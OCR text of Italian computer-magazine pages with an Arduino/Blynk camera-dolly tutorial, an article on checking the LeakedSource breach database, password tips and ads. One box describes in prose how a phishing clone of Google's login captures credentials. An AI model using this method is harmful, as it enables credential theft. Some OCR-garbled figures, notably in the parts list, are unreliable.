la prima "dolly” della storia: un grosso 
carrello con ruote sul quale veniva posizionata 
la cinepresa. Questo permise al film Cabiria 
di contenere la prime immagini della storia 
filmate con una camera che si sposta durante le 
riprese: fino a quel momento, infatti, le riprese 
erano soltanto fisse, perché le cineprese erano 
molto ingombranti, pesanti, delicate e senza il 
carrello di Pastrone era praticamente impossi¬ 
bile spostarle mentre la pellicola stava girando. 


Dopo un secolo le cineprese sono ormai poco 
più grandi di un scatola di fiammiferi (le GoPro 
sono certamente un buon compromesso tra 
qualità e ingombro) e pesano meno di un pacco 
di pasta. Inoltre, grazie al passaggio al digitale, 
non c’è più il pericolo di danneggiare in qualche 
modo lo scorrimento della pellicola se si inclina 
la cinepresa. È quindi abbastanza facile capire 
perché oggi più che mai le dolly siano diffuse: 
costruirle è diventato molto semplice, perché 
non è necessario utilizzare materiali capaci 
di sopportare grandi pesi e il loro ingombro è 


ridotto al minimo. Certo, i prezzi sono ancora 
piuttosto alti per le tasche di un videoamatore: 
una dolly "semplice" costa almeno 100 euro, 
mentre per una "motorizzata", il cui carrello 
viene spostato da un motore elettrico, sono 
necessari almeno 500 euro. 

Il bello del fai-da-te 

Possiamo costruire qualcosa di più economi¬ 
co, ma comunque valido, per qualche piccolo 
filmato casalingo? Certo, grazie ad Arduino. 
Costruire un carrello è piuttosto semplice uti- 


□ Usiamo il legno e l’alluminio per 

Per realizzare la struttura di base della dolly utilizzeremo pochi componenti di legno e alluminio. Mentre 
per l’assemblaggio sono necessari un seghetto, un trapano e della colla per legno. Mettiamoci all’opera. 



^ Un primo taglio 

Per realizzare la struttura prendiamo un asse 
di legno di abete dallo spessore di almeno 1,5 
cm e 3 cm di larghezza. Fissiamolo, per comodità, su 
una morsa e procediamo a tagliarlo con una sega, 
producendo un parallelepipedo di legno della lunghez¬ 
za di circa 8 cm. 



^ Due copie uguali 

Ci servono altri due pezzi di legno identici a 
quello che abbiamo appena tagliato. La solu¬ 
zione più semplice consiste nell'appoggiare il legno 
appena tagliato sull’asse da cui siamo partiti, in modo 
da avere un riferimento delle sue dimensioni e proce¬ 
dere a tagliare altri due pezzi. 



^ Prima i fori in verticale... 

Ora scegliamo uno dei tre pezzi di legno appe¬ 
na realizzati e posizioniamolo all'interno della 
morsa in posizione verticale. Questo sarà il carrello 
della dolly, quindi dobbiamo produrre con il trapano 
due fori paralleli, attraverso i quali faremo poi passa¬ 
re le guide. 
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LA USTA DELLA SPESA PER RIDURRE I COSTI 


Per costruire b nostra 
dolly servono pochi 
materiali Facilmente 
reperibili nel negozi di 
bricolage o di model¬ 
lismo con una spesa 
massimo di circa HO 
euro 

Un asse di legno 
di abete delle di¬ 
mensioni di 1,5 x 3 cm 
(si trova nel negozi di 
bricolage* 2 euro 
Due barre ci allu¬ 
minio detto spes¬ 
sore di I cm e della 
lunghezza di I metro al 
massimo (si trovano 


nei negozi d bricolage* 

8 euro 

Un servomotore, 
anche noto come 
•servo* o •stepper tei 
trova su e8ay o nei 
negozi di modeSsmo* 
(>euno 

✓ Ih Arduino Uro con 
Ethernet Shietd (si 
trova su eBay* B euro 
In alternativa al 
precedente-1 Ar¬ 
duino Yun con Wi-Fì (si 
trova su eBay* (£ euro 
Opzionale I batte¬ 
ria con adattatore 
USB tei trova su eBay* 


IO euro 

I vantaggio cfi Arduho 
Yun consiste nel Fat¬ 
to che dispone di un 
modulo Wi-Fi molto 
Facile da utizzare già 
integrato netta scheda 
e permette al mecca¬ 
nismo di Funzionare 
senza ccm Inottre, uti¬ 
lizzando anche la bat¬ 
teria, b dotty potrebbe 
essere Fadmente tra¬ 
sportata e portata in 
qualsiasi luogo, anche 
dove non sia presente 
una presa per la cor¬ 
rente elettrica 







lizzando dei parallelepipedi di legno e delle 
aste di alluminio da utilizzare come binari 
su cui far scorrere il carrello. Su quest’ultimo 
può essere appoggiata la cinepresa, oppure è 
possibile fissare su di esso un piccolo treppiedi 
(di quelli tascabili) rendendo la cinepresa più 
stabile e sicura. In questo modo, con una decina 
di euro otteniamo la nostra dolly "semplice”. 
Per trasformarla in una versione motorizzata 
possiamo utilizzare un servomotore: si tratta 
di un motore elettrico di grande precisione, che 
può essere controllato da un piccolo computer 
come Arduino. Naturalmente, per chi non è un 
programmatore, programmare Arduino può 
rivelarsi diffìcile e comunque sarebbe com¬ 
plicato controllare lo spostamento del carrello 
con qualche manopola (dei potenziometri). 
Possiamo rendere il tutto più semplice utiliz¬ 
zando Blynk, un’app per smartphone e tablet 
Android e iOS. Con Blynk è possibile utilizzare 
una comoda e rapida procedura guidata per 
controllare Arduino e tutto ciò a cui è connesso 
(per esempio il servomotore). Con il nostro tu- 
torial vedremo come muovere il carrello della 
dolly direttamente dal nostro smartphone. 
Naturalmente noi presentiamo il progetto più 
semplice possibile, ma possiamo migliorarlo 
come preferiamo: per esempio, il nostro pro¬ 
getto funziona tirando il carrello in una sola 
direzione, ma è possibile muovere il carrello 
anche nella direzione opposta utilizzando un 


altro filo oppure una molla. Sostituendo il fi¬ 
lo con una cinghia dentata, la quale però ha 
un costo non troppo basso, diventa possibile 
ottenere un maggiore controllo e muovere il 


carrello in entrambe le direzioni in modo molto 
semplice. Insomma, non c’è davvero limite alla 
fantasia per realizzare riprese video davvero 
da mozzafiato! 


creare la slitta fotografica fai-da-te 



... poi quelli in orizzontale 

^ Gli altri due parallelepipedi di legno serviranno 
come basi delle guide: dovremo quindi produr¬ 
re due fori anche su questi due componenti, facen¬ 
do attenzione che non trapassino completamente il 
legno, sul lato largo. La distanza tra i fori deve essere 
identica a quella del carrello. 


^ Tutto sotto controllo 

j Proviamo adesso ad assemblare i vari pezzi: 
montiamo le due guide su una delle basi, poi 
facciamo scorrere il carrello sulle guide e chiudiamo 
il tutto con l’altra base. Fatto questo, proviamo a spo¬ 
stare il carrello per assicurarci che scorra liberamente 
senza incastrarsi. 


^ Colla per fissare 

0 L'ultima operazione da fare è fissare le basi 
delle guide con della colla per legno, in modo 
da impedire che possano muoversi. Poi possiamo uti¬ 
lizzare la colla anche per incollare un piccolo treppie¬ 
di sopra al carrello, oppure lasciarlo com'è, almeno 
per adesso. 
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13 Si comanda dallo smartphone 

Costruita la slitta della nostra dolly, possiamo collegare il servomotore alla scheda Arduino e poi quest’ultima a 
Internet. In questo modo, utilizzando l’app Blynk sul telefonino o sul tablet, possiamo controllare il servomotore. 



^ Una vite e il servomotore 

Su un lato del carrello dobbiamo fissare una 
vite: a tale vite dovremo poi legare un filo 
(anche uno da pesca va bene) e fissarne l’altra estre¬ 
mità servomotore. Fissiamo quindi il servomotore su 
una delle basi della dolly, quella verso cui è rivolta la 
vite del carrello. 




< «il 


B 




Arduino va in rete 

Per il nostro progetto è utile che la scheda 
Arduino sia dotata di modulo Ethernet Shleld: 
dopo averlo montato possiamo collegare il servomo¬ 
tore. Il servo dispone di tre cavi: uno positivo (rosso), 
uno negativo (nero) e uno per il segnale (bianco o qual¬ 
siasi altro colore). 




^ I tre collegamenti 

Colleghiamo il cavo del positivo al pin 5V di 
Arduino, mentre quello negativo al pin GND. 
Connettiamo quindi il cavo del segnale a un pin digitale 
PWM di Arduino, per esempio il pin numero 9. Colle¬ 
ghiamo infine Arduino alla rete Ethernet e tramite USB 
a un computer. 


1 * — 



WIDGETBOX 


o 

Button 


•• 

Slider 



Urge Slider 


ST\ 




^ Scarichiamo l’app Blvnk 

^ Installiamo adesso sul nostro smartphone l'app 
gratuita Blynk e avviamola: ci verrà chiesto di 
eseguire il login oppure di creare un nuovo account. 
L’indirizzo e-mail che forniamo deve essere valido, per¬ 
ché ad esso verranno inviati i codici di autorizzazione 
dei progetti. 



^ Serve l’autorizzazione 

g Clicchiamo sul pulsante Create newproject. 

Diamo un nome al progetto, per esempio dolly, 
selezioniamo il tipo di Arduino che stiamo utilizzando 
e clicchiamo sul pulsante Email per inviare alla nostra 
posta elettronica il codice autorizzazione del progetto 
appena creato. 



J_-_ 


^ Prepariamo lo slider 

Apriamo adesso la WidgetBox e scegliamo un 
oggetto chiamato Slider. Si tratta di una barra 
simile a quella che nei player multimediali si utilizza per 
scorrere lungo un brano audio o un video: noi la utiliz¬ 
zeremo per impostare la posizione del carrello lungo 
la dolly, quindi è intuitivo. 



± Qual è il connettore giusto? 

Toccando lo slider appena aggiunto, vedremo 
le sue impostazioni. Il range deve andare da 0 
a 255 e possiamo impostarlo sul pin D9 oppure sul pin 
1 13. Il pin D9 è direttamente quello del servo, mentre 
I 13 è un pin virtuale di Blynk che fa da tramite: possia¬ 
mo usare uno qualsiasi dei due. 


^ La libreria di Blvnk 

g Ora andiamo sul sito www.winmagazine.it/ 
link/3401 e scarichiamo la libreria Blynk. 
Apriamo poi l’ambiente di sviluppo Arduino IDE, pre¬ 
sente sul computer a cui abbiamo connesso Arduino, 
e clicchiamo sul menu Sketch/lmporta libreria/Add 
library per aggiungere il file ZIP scaricato. 


^ Il codice sorgente 

0 Possiamo copiare il codice presente alla pagi¬ 
na www.winmagazine.it/link/3402 inserendo al 
posto di YourAuthToken il codice di autorizzazione che 
ci è stato precedentemente inviato tramite e-mail. Infi¬ 
ne, carichiamo lo sketch sulla scheda Arduino e avvia¬ 
mo il progetto premendo il pulsante Play. m 
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Sul Web c’è un vero e proprio supermarket di account 
personali. Scopri se anche il tuo è stato compromesso 

V iviamo ormai in un mondo talmen- nostra e-mail può leggere i messaggi 
te informatizzato che il nostro al- ricevuti e scoprire a quali siti siamo re¬ 
ter ego digitale è rappresentato dai gistrati) e tenterebbe di entrare in essi 
vari account di cui disponiamo presso i utilizzando la stessa password che ha 
siti più importanti. Le e-mail, i forum, appena scoperto. 



l’archiviazione cloud, i negozi on-line: 
ciascuno di questi servizi richiede delle 
credenziali di accesso, tipicamente un 
nome utente e una password. La sicurez¬ 
za delle nostre identità digitali dipende, 
dunque, dalle chiavi di accesso che sce¬ 
gliamo. Ma ricordare tante password 
diverse risulta difficile e, soprattutto 
quando si hanno tanti account, la ten¬ 
tazione di utilizzarne una per diversi 
servizi è molto forte. Tuttavia, questa 
decisione è molto pericolosa: infatti, 
nel caso in cui un pirata riuscisse a sco¬ 
prire una nostra password proverebbe 
a collegare gli altri nostri account (per 
esempio, se scopre la password della 


Password sono in chiaro 

Viene lecito domandarsi come faccia un 
pirata a scoprire le nostre password. Eb¬ 
bene, esistono diverse possibilità 
per ottenere questo risulta¬ 
to, ma le due più comu¬ 
ni sono quasi banali: 
può provare tutte 
la combinazioni 
possibili di lette¬ 
re e numeri fino 
a trovare quella 
giusta, oppure 
può con qualche 
trucco convince- 



SE VUOI VEDERE LA PASSWORD IN CHIARO DEVI PAGARE! 


Il sito LeakedSource permette non solo di sapere se il pro¬ 
prio account è stato compromesso, ma anche quale sia la 
password che viene considerata valida per tale account. In 
realtà questa opzione è utile soltanto se si vuole verificare 
se la password sia davvero stata identificata o se si tratti di 
un "falso positivo" (poco utile comunque visto che è buona 
norma modificare la propria password a prescindere dal 
fatto che sia stata identificata correttamente o meno). 
Apparentemente, però, questa possibilità potrebbe per¬ 
mettere ai pirati di scoprire facilmente le password degli 
utenti. Per evitare questo tipo di pericolo, LeakedSource 
permette la visione delle password e di altre informazioni 
utili soltanto dopo il pagamento di un abbonamento. 
Tale pagamento viene eseguito tramite carte di credito 
tracciabili, dunque nessun pirata lo utilizzerebbe, perché 
verrebbe immediatamente identificato e denunciato. Il 
servizio è quindi comodo soltanto per chi non intende 
commettere azioni illegali con i dati raccolti. 
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5 REGOLE D'ORO PER NON CORRERE RISCHI! 


Nessuno può considerarsi al si¬ 
curo da un furto di password ed 
è per questo motivo che è im¬ 
portante prendere delle semplici 
precauzioni per evitare che ciò 
possa crearci grandi problemi. 

1 CREARE DIVERSI INDI¬ 
RIZZI E-MAIL 

Uno da non comunicare a nessu¬ 
no e da usare solo per iscriversi 
a siti importanti (Amazon, eBay, 
PayPal eccetera); un altro da usare 
per iscriversi a siti di vario genere 
(blog, forum on-line...); e alme¬ 
no un terzo da comunicare ad 
amici e colleghi per mantenersi 
in contatto. In questo modo, una 
eventuale perdita di credenziali 


degli account più"pubblici"non 
intaccherà realmente la sicurezza 
di ciò che conta davvero. 

2 IMPOSTARE UN NUMERO 
DI TELEFONO PER 
RECUPERARE LA PASSWORD 

Un pirata che riesce a scoprire la 
password di un nostro account 
importante per prima cosa la 
modifica, in modo da impedir¬ 
ci l'accesso. Solitamente, però, 
non può modificare il numero di 
telefono associato all'account e 
grazie ad esso potremo recupe¬ 
rare l'account stesso. 


CRITTOGRAFARE I 
IMPORTANTI 


FILE 


Se siamo abituati a usare servizi 
come Google Drive per caricare 
on-line dei file confidenziali, ci 
conviene crittografarli prima di 
inviarli su Internet (meglio se 
con un programma come Cryp- 
tophane: www.winmagazine.it/ 
link/3611). In questo modo, un 
eventuale malintenzionato non 
potrebbe comunque leggerli. 

4 NON ARCHIVIARE MAI 
LE PASSWORD IN 
CHIARO 

Qualcuno ha l'abitudine di inviar¬ 
si tramite e-mail dei messaggi 
contenenti le password di ac¬ 
cesso ai siti ai quali si registra. È 
una pessima idea! Se qualcuno 


riuscisse ad entrare nell'account 
e-mail avrà accesso automatico 
anche agli altri siti. 

5 NON CARICARE SUL WEB 
DI TUTTO E DI PIÙ 

In generale, ricorda che ciò che 
carichi sul Web non è più da 
considerare privato (alcune tue 
immagini potrebbero diventare 
di pubblico dominio contro il tuo 
volere e un tuo stato "privato" su 
Facebook potrebbe essere letto 
da altre persone). In altre pa¬ 
role, se una cosa è privata non 
caricarla sul Web, a prescindere 
dalle promesse di garanzia della 
privacy del sito Web o del gestore 
di Storage on-line. 





re noi stessi ad inviargliela. La prima 
possibilità è il cosiddetto brute force: 
il metodo è di per sé infallibile, perché 
è ovvio che provando tutte le combi¬ 
nazioni possibili prima o poi si trova 
quella giusta, a prescindere da quanto 
complicata possa essere la password. 
Tuttavia, è un metodo che richiede molto 
tempo: ecco, dunque, che la robustezza 
della password è fondamentale. Infat¬ 
ti, una troppo corta e facile, come 
“1234” oppure "alligatore3", viene 
scoperta molto rapidamente da 
un meccanismo di brute for¬ 
ce, soprattutto se abbinato 
ad un dizionario (signifi¬ 
ca che prima di tentare le 
combinazioni casuali 
si provano delle 
combinazioni di 
numeri e parole 
molto comuni). 
La seconda op¬ 
zione è più fre¬ 
quente di quanto 
si possa immagi¬ 
nare: ci è mai capi¬ 
tato di ricevere una e- 
mail da parte di qualcuno 
che fingeva di essere il gestore 
di uno dei siti Web a cui siamo 
registrati, nella quale veniva chiesto 
di rispondere indicando nome utente 
e password per svolgere una qualche 
forma di test? Probabilmente abbiamo 
cestinato immediatamente l'e-mail in 
questione, riconoscendo la truffa. Ma 


se questo tipo di e-mail è ancora in cir¬ 
colazione significa che ci sono molte 
persone che abboccano alla trappola: 
nessun tipo di truffa continua ad essere 
perpetrata se non produce frutti. Com¬ 
battere questo tipo di furti di password 
è abbastanza semplice: basta ricordarsi 
sempre che nessun gestore ci chiederà 
mai di indicare le nostre credenziali 
via e-mail o su siti Web diversi dal suo 
sito ufficiale. 

Un archivio da paura 

Nel complesso, il numero di account che 
vengono compromessi da pirati che rie¬ 
scono a scoprire la password in un modo 
o nell’altro aumenta continuamente. 
Spesso, poi, gli stessi pirati mettono in 
vendita sui canali underground del¬ 
la Rete le password scoperte, magari 
pubblicandole su qualche sito del Deep 
Web, per offrire ad altri malintenzio¬ 
nati la possibilità di sfruttare i nostri 
account per scopi illegali. E sono stati 
addirittura creati appositamente dei 
siti Web che collezionano l'elenco degli 
account rubati, così chiunque può con¬ 
sultarli e verificare se il suo account sia 
stato violato. Uno dei siti più attendibili 
in questo senso è www.leakedsource. 
com: si tratta in realtà di un database 
on-line piuttosto affidabile in cui sono 
archiviati quasi due milioni di account 
violati dai pirati di tutto il mondo. Ve¬ 
diamo come sfruttarlo al meglio per 
verificare se nell'immenso archivio c’è 
anche il nostro. 
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BUONI 

CONSIGLI 


PIÙ È LUNGA, 

PIU ESICURÀ! 

Una password, compo¬ 
sta da lettere, numeri, 
e simboli, lunga 4 
caratteri ha quasi 70 
milioni di possibili 
combinazioni. Provando 
una combinazione ogni 
millisecondo con un al¬ 
goritmo di brute force, 
verrebbe trovata in cir¬ 
ca 20 ore! Per tal motivo 
conviene scegliere una 
parola alfanumerica più 
lunga di 8 caratteri. 

COSA FARE 
IN CASO DI FURTO 

Se sospettiamo di aver 
subito il furto del nostro 
account di accesso al 
servizio di home ban- 
king è importante avvi¬ 
sare immediatamente 
l'istituto di credito e 
segnalare l'accaduto 
alla Polizia Postale. In 
questo modo potremo 
evitare che i pirati rie¬ 
scano a prelevare soldi 
dal nostro conto corren¬ 
te o usare i nostri dati 
per compiere operazioni 
finanziarie illegali. 

COSI CI SPIANO 
DALLA TASTIERA 

Una grave minaccia per 
la sicurezza delle nostre 
password sono i keylog- 
ger: l'unica soluzione 
per proteggersi consiste 
nel digitare le password 
con alcuni caratteri di 
troppo, cancellandoli 
prima di eseguire 
l'accesso. Ad esempio, 
conviene scrivere alliga- 
torero e poi cancellare 
la sillaba rose la nostra 
password è alligatore 
(sconsigliamo ovvia¬ 
mente di usare una 
chiave di accesso simile 
vista la sua "debolezza" 
che la rende facilmente 
scopribile con un sem¬ 
plice brute force). 


L’account è compromesso? 

Effettuiamo una ricerca nel database di LeakedSource per verificare se siamo rimasti vittime di 
un furto di credenziali. Incrociamo le dita e... speriamo di non trovare la nostra e-mail nella lista! 



Un database seniore aaqiornato 


Per iniziare, colleghiamoci al sito www.leakedsource. 
com/main/databaselist. Qui è indicata la data dell’ultimo 
aggiornamento del database: è importante perché se la data è 
precedente al momento in cui riteniamo che il nostro account 
possa essere stato violato, è ovvio che non ne troveremo tracce. 


a ricerca deli’account rubato 


Su www.leakedsource.com possiamo eseguire la ricerca. 
Spuntando wildcard verranno forniti tutti i risultati simi¬ 
li (come quando nelle ricerche usiamo l’asterisco). Possiamo 
eseguirla per indirizzo e-mail o per altri dati come un numero 
di telefono od un indirizzo IP, oltre al nostro nome e cognome. 



Ci hanno rubato l'identità? 


Il metodo più affidabile consiste nell’eseguire la ricerca 
per indirizzo e-mail: se viene trovato nel database, vie¬ 
ne indicato un elenco dei risultati. Non vengono indicati i detta¬ 
gli, ma se appare un sito a cui siamo effettivamente registrati, 
probabilmente il nostro account è stato davvero compromesso. 


Cerchiamo la nostra password 


Per vedere anche i dettagli, dobbiamo registrarci su Lea¬ 
kedSource. Basta indicare un nome utente e una pas¬ 
sword. Per poter vedere le password dobbiamo pagare 0,76 dol¬ 
lari al giorno e il pagamento può essere eseguito con carta di cre¬ 
dito (box Se vuoi vedere la password in chiaro devi pagare!). 


COSÌ I PIRATI RUBANO LE CHIAVI DI ACCESSO Al SITI 

Per un pirata, il metodo più semplice per rubare gli account altrui consiste 
nel creare un sito di phishing. Per realizzare il clone di un sito il pirata apre nel 
browser la pagina da copiare, per esempio il login di Google, ci clicca sopra col 
tasto destro del mouse e sceglie Visualizza sorgente pagina. Seleziona tutto il 
codice ( Ctrl+A ), lo copia negli appunti (Ctrl+Q e lo incolla ( Crtl+V) in un editor 
come Blocco note o Notepad++. Nel codice cerca il form HTML per l'inserimen¬ 
to di nome utente e password e modifica la sua action in modo da puntare su 
una pagina PHP creata ad hoc (che gira su un server di sua proprietà). Questa 
pagina si occupa di memorizzare nome utente e password digitati dalla vittima 
e di reindirizzare l'utente alla vera pagina di login di Google, o all'interfaccia di 
Gmail, per non destare sospetti. Se, da utenti, ci capitasse di finire sulla pagina 
di login falsa, potremmo notare che assomiglia davvero molto a quella del vero 
Google. Due particolari ci mettono in guardia: l'indirizzo non è quello standard 
di Google, e in secondo luogo il protocollo utilizzato dal server non è HTTPS. 
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ESET NOD32 


E N JOY SAFER TECHNOLOGY 




LA TUA LINEA 
v DI DIFESA 
,SU INTERNET 


Antivirus 
Antispyware 
Anti-Phishing 
Anti-Ransomware 
Syslnspector 
Sistema di ripristino 
Protezione USB 
Social Media Scanner 
Protezione exploit 
Advanced Memory Scanner 
Protezione vulnerabilità 


FUTURE Time 

tecnologie antivirus 


PROVALO 

GRATIS 

www.eset.it 


ESET Mobile Security 

Proteggi gratuitamente il tuo 
cellulare e il tuo tablet Android 




FIBRR 50 r€GR 
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PRIMI 3 MESI. SUCCESSIVAMENTE 38C/MESE 
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VOCE ILLIMITATA (***) 
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Il costo di attivazione della fibra è variabile, in base alle promozioni in corso, contattateci per ulteriori informazioni. 

(*) Naviga fino a 30Mbps in download e 3Mbps In upload (**) Naviga fino a SOMbps in download e lOMbps in upload (***) fino a 3000 minuti mese effettuati sulla rete fissa 
italiana, 300 minuti mese effettuati sulla rete mobile italiana. 
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